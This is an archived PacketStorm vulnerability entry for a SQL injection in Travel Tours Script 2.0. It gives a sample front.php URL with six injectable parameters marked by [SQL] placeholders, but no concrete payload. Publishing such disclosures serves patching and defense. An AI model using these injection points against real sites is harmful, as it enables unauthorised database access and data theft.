Travel Tours Script 2.0 SQL Injection

2017-03-12T00:00:00
ID PACKETSTORM:141590
Type packetstorm
Reporter Ihsan Sencan
Modified 2017-03-12T00:00:00

Description

                                        
                                            `# # # # #   
# Exploit Title: Travel Tours Script v2.0 - SQL Injection  
# Google Dork: N/A  
# Date: 11.03.2017  
# Vendor Homepage: https://www.phpjabbers.com/  
# Software: https://www.phpjabbers.com/travel-tours-script/  
# Demo: http://demo.phpjabbers.com/index.php?demo=vpl&front=1&lid=1  
# Version: 2.0  
# Tested on: Win7 x64, Kali Linux x64  
# # # # #   
# Exploit Author: Ihsan Sencan  
# Author Web: http://ihsan.net  
# Author Mail: ihsan[@]ihsan[.]net  
# # # # #  
# SQL Injection/Exploit :  
# http://localhost/[PATH]/front.php?controller=pjListings&action=pjActionIndex&sortby=stars&direction=[SQL]&listing_search=1&type=[SQL]&rating_from=[SQL]&rating_to=[SQL]&price_from=[SQL]&price_to=[SQL]  
# Etc..  
# # # # #  
  
`